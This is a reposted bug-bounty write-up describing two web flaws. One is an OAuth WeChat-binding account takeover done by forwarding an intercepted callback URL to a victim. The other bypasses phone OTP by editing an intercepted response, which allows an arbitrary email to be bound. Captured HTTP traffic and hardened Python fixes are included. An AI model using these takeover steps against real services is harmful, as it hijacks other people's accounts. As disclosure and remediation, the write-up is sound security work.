Sharing Two SRC Examples

admin, 1 November 2024 12:52:02, 12 views, 3453 characters, 11 min 30 s read

No.0

Preface

The old boss at 隐雾 pushed me into doing a share, so I'm turning in two real-world cases to get it over with. Go easy on me, experts.

No.1

Account takeover via an OAuth flaw

Principle: exploit a flaw in the OAuth binding flow to take over an account. A code is generated for my own WeChat, and my WeChat ends up bound to somebody else's account, which amounts to an account takeover.

First, open the page for binding WeChat.


Click "Bind WeChat".


Then turn on Burp's intercept and scan the QR code with WeChat on the phone.


Record the URL of this request, then drop the request (this matters: it must be dropped, not used yourself, because each code can only be redeemed once). The URL is then sent to the victim; once they visit it, their account is bound to our WeChat.

Here an alternate account plays the victim. The victim opens the URL copied above, and on that click my WeChat is bound to their account, taking it over.
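The root cause in case No.1 is that the callback binds whatever WeChat identity the code resolves to onto whichever logged-in session happens to visit the callback URL, with nothing tying that visit back to the session that started the binding. The following Python model, added here as an illustration and not the vendor's code, shows that callback beside a hardened version that issues a per-session, single-use state value when the flow starts and refuses any callback whose state does not match. The in-memory session store, the exchange_code stub standing in for the provider's token endpoint, and the names start_binding, hardened_callback and BINDINGS are all assumptions made for the demo.

```python
"""
Model of the WeChat-binding OAuth callback from case No.1 (added example,
not the vendor's code; sessions, the provider stub and the `state` scheme
are assumptions for the demo).
"""
import hmac
import secrets

# Constructed stand-in for the identity provider: maps a single-use
# authorization code to the provider account (openid) that produced it.
_PROVIDER_CODES = {}


def provider_issue_code(openid):
    """Simulate the provider handing out a code after the QR scan."""
    code = secrets.token_urlsafe(16)
    _PROVIDER_CODES[code] = openid
    return code


def exchange_code(code):
    """Redeem a code exactly once at the provider; None if unknown or used."""
    return _PROVIDER_CODES.pop(code, None)


class Session:
    """Logged-in web session of one application account (hypothetical)."""
    def __init__(self, account_id):
        self.account_id = account_id
        self.pending_state = None


BINDINGS = {}  # account_id -> bound provider openid


def vulnerable_callback(session, code):
    """Before: only `code` is checked, so any session that opens the
    callback URL gets the code owner's WeChat bound to its account."""
    openid = exchange_code(code)
    if openid is None:
        return "invalid code"
    BINDINGS[session.account_id] = openid
    return "bound"


def start_binding(session):
    """Step 1 of the fix: the authorize URL built for this session carries
    a fresh random `state`, remembered server-side in the session."""
    session.pending_state = secrets.token_urlsafe(32)
    return session.pending_state


def hardened_callback(session, code, state):
    """After: the callback is honoured only by the session that started
    the flow, and the stored state is consumed on first use."""
    expected = session.pending_state
    session.pending_state = None
    if expected is None or not isinstance(state, str) \
            or not hmac.compare_digest(expected, state):
        # This session never started a binding, or the state was already
        # used: a forwarded or replayed callback link lands here.
        return "state mismatch"
    openid = exchange_code(code)
    if openid is None:
        return "invalid code"
    BINDINGS[session.account_id] = openid
    return "bound"


if __name__ == "__main__":
    # Two constructed sessions; a callback link created in A is opened in B.
    a, b = Session("acct-A"), Session("acct-B")
    print(vulnerable_callback(b, provider_issue_code("wx-A")))          # bound
    state = start_binding(a)
    print(hardened_callback(b, provider_issue_code("wx-A"), state))     # state mismatch
```

The state check is the standard OAuth CSRF defence; the same outcome can be reached by storing the initiating account id alongside the state and comparing it in the callback. Either way the callback must refuse to act for a session that did not begin the flow, and a mismatch is worth logging, since a burst of them against one account is the visible trace of the forwarded-link pattern.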


No.2

Arbitrary email binding

First register an account.

https://XXXX.com/login?

Phone number 13XXXXXXX7; log in with an SMS verification code. At present the only login methods are verification code and WeChat.


After logging in, go to the personal information page.


The email field shows "not bound". When you try to bind, it first asks you to verify your identity. Don't request a verification code here; just enter an arbitrary one: 000000.

Capture the request:

POST /api/user/verifyAccount HTTP/2
Host: XXXXX.com
Cookie: XXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://aXXXX
X-Requested-With: XMLHttpRequest
Content-Type: application/json
X-Isuda-App-Locale: zh-CN
Csrf-Token: Pg8sCbu1-vfqE2e3_VPM5DDgRFddtT3TFeic
X-Isuda-Date: 2024-08-10T17:11:48Z
Locale: zh-CN
Content-Length: 40
Origin: https://XXXXXX
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"token":"000000","accountType":"phone"}

Look at the response (the message says the phone verification code does not match):

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 10 Aug 2024 17:11:57 GMT
Etag: W/"31-ladpSwO8jzDGrK+NNauEztTj9z4"
Server: nginx
Server-Timing: mid-FaviconMiddleWare; dur=0.022916
Server-Timing: mid-EnsureDBConnected; dur=0.048112999999999996
Server-Timing: mid-FlashMiddleWare; dur=1.3874149999999998
Server-Timing: mid-Authenticate; dur=0.14233099999999999
Server-Timing: mid-CSRFMiddleware; dur=0.132543
Server-Timing: mid-ContextMiddleware; dur=0.31887
Server-Timing: mid-DebugMiddleware; dur=0.008791
Server-Timing: mid-OfflineMiddleWare; dur=1.2282
Server-Timing: mid-OperationLogMiddleWare; dur=0.023925
Server-Timing: mid-XmlMiddleware; dur=0.012435
Server-Timing: mid-CORSMiddleware; dur=0.012601999999999999
Server-Timing: mid-unknown; dur=5.681286999999999
Server-Timing: mid-unknown; dur=0.014254999999999999
Server-Timing: controller; dur=5.5088019371032715; desc="Controller"
Server-Timing: context-get-company; dur=13.881817
Server-Timing: total; dur=18.218661; desc="Total Response Time"
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: X-HTTP-Method, X-HTTP-Method-Override, X-Method-Override
X-Csrf-Token: uNvKgVnU-xmj2ri11jLmfmom9L8XxnlUNz7E

{"status":1,"message":"手机验证码不匹配"}

Modify the response, changing "status" from 1 to 0:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 10 Aug 2024 17:11:57 GMT
Etag: W/"31-ladpSwO8jzDGrK+NNauEztTj9z4"
Server: nginx
Server-Timing: mid-FaviconMiddleWare; dur=0.022916
Server-Timing: mid-EnsureDBConnected; dur=0.048112999999999996
Server-Timing: mid-FlashMiddleWare; dur=1.3874149999999998
Server-Timing: mid-Authenticate; dur=0.14233099999999999
Server-Timing: mid-CSRFMiddleware; dur=0.132543
Server-Timing: mid-ContextMiddleware; dur=0.31887
Server-Timing: mid-DebugMiddleware; dur=0.008791
Server-Timing: mid-OfflineMiddleWare; dur=1.2282
Server-Timing: mid-OperationLogMiddleWare; dur=0.023925
Server-Timing: mid-XmlMiddleware; dur=0.012435
Server-Timing: mid-CORSMiddleware; dur=0.012601999999999999
Server-Timing: mid-unknown; dur=5.681286999999999
Server-Timing: mid-unknown; dur=0.014254999999999999
Server-Timing: controller; dur=5.5088019371032715; desc="Controller"
Server-Timing: context-get-company; dur=13.881817
Server-Timing: total; dur=18.218661; desc="Total Response Time"
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: X-HTTP-Method, X-HTTP-Method-Override, X-Method-Override
X-Csrf-Token: uNvKgVnU-xmj2ri11jLmfmom9L8XxnlUNz7E

{"status":0,"message":"手机验证码不匹配"}

With the first step bypassed, the email can be bound directly; any email address can be entered here.
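What case No.2 shows is a client-side decision: the front end reads "status" from the verifyAccount response and, on 0, moves on to the bind step, while the bind request carries nothing the server can check to confirm the OTP step actually succeeded. Flipping one field in the intercepted response therefore unlocks binding. The Python model below, added here as an illustration and not the vendor's code, puts the verify-then-bind flow beside a hardened version in which a correct OTP yields a short-lived server-side ticket and the bind endpoint refuses without it. The endpoint names follow the captured request; the OTP store, the ticket, the OTP_TTL constant and the bind endpoint's parameters are assumptions made for the demo.

```python
"""
Model of the verify-then-bind flow from case No.2 (added example, not the
vendor's code; the stores, the ticket and the bind parameters are
assumptions for the demo).
"""
import hmac
import secrets

OTP_STORE = {}     # account_id -> (otp, expires_at)
VERIFIED = {}      # account_id -> (ticket, expires_at)
EMAILS = {}        # account_id -> bound email
OTP_TTL = 300      # seconds an OTP or a verification ticket stays valid


def send_phone_otp(account_id, now):
    """Issue a 6-digit OTP for the account's phone. It is returned here only
    so the demo can use it; in a real system it goes out by SMS."""
    otp = f"{secrets.randbelow(10**6):06d}"
    OTP_STORE[account_id] = (otp, now + OTP_TTL)
    return otp


def verify_account(account_id, token, now):
    """Server side of POST /api/user/verifyAccount (response shape assumed).
    A wrong or expired code fails; a correct one yields a ticket that the
    server, not the client, remembers."""
    entry = OTP_STORE.pop(account_id, None)   # one attempt per issued code
    if entry is None or now > entry[1] or not isinstance(token, str) \
            or not hmac.compare_digest(entry[0], token):
        return {"status": 1, "message": "phone verification code mismatch"}
    ticket = secrets.token_urlsafe(32)
    VERIFIED[account_id] = (ticket, now + OTP_TTL)
    return {"status": 0, "ticket": ticket}


def vulnerable_bind_email(account_id, email):
    """Before: assumes the client only calls this after verifyAccount
    reported success, which the client cannot prove and an intercepting
    proxy can fake by editing the earlier response."""
    EMAILS[account_id] = email
    return {"status": 0}


def hardened_bind_email(account_id, email, ticket, now):
    """After: binding succeeds only with the unexpired ticket the server
    itself issued for this account, and the ticket is consumed on use."""
    entry = VERIFIED.get(account_id)
    if entry is None or now > entry[1] or not isinstance(ticket, str) \
            or not hmac.compare_digest(entry[0], ticket):
        return {"status": 1, "message": "identity not verified"}
    del VERIFIED[account_id]
    EMAILS[account_id] = email
    return {"status": 0}


if __name__ == "__main__":
    now = 1_700_000_000            # constructed clock value
    otp = send_phone_otp("demo", now)
    print(verify_account("demo", "000000", now))            # status 1, code consumed
    otp = send_phone_otp("demo", now)
    r = verify_account("demo", otp, now)
    print(hardened_bind_email("demo", "a@example.com", "forged", now))   # status 1
    print(hardened_bind_email("demo", "a@example.com", r["ticket"], now))  # status 0
```

Two points of design matter here beyond the ticket itself: the OTP is consumed on the first attempt, so the server also bounds brute force, and the ticket is bound to the account and to a short lifetime. Binding an address the requester does not own is a separate problem the ticket does not solve; ownership of the new email should be confirmed by a message sent to that address before the change takes effect.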


No.3

Inner monologue

I've been hunting bugs for a while now and have earned my tuition back. The old boss begs us to do shares every single day; it's kind of pitiful. Can't he just write them himself?

No.4

Originally published on the WeChat official account 隐雾安全: 分享两个Src实例

Reposted on CN-SEC中文网: https://cn-sec.com/archives/3342571.html
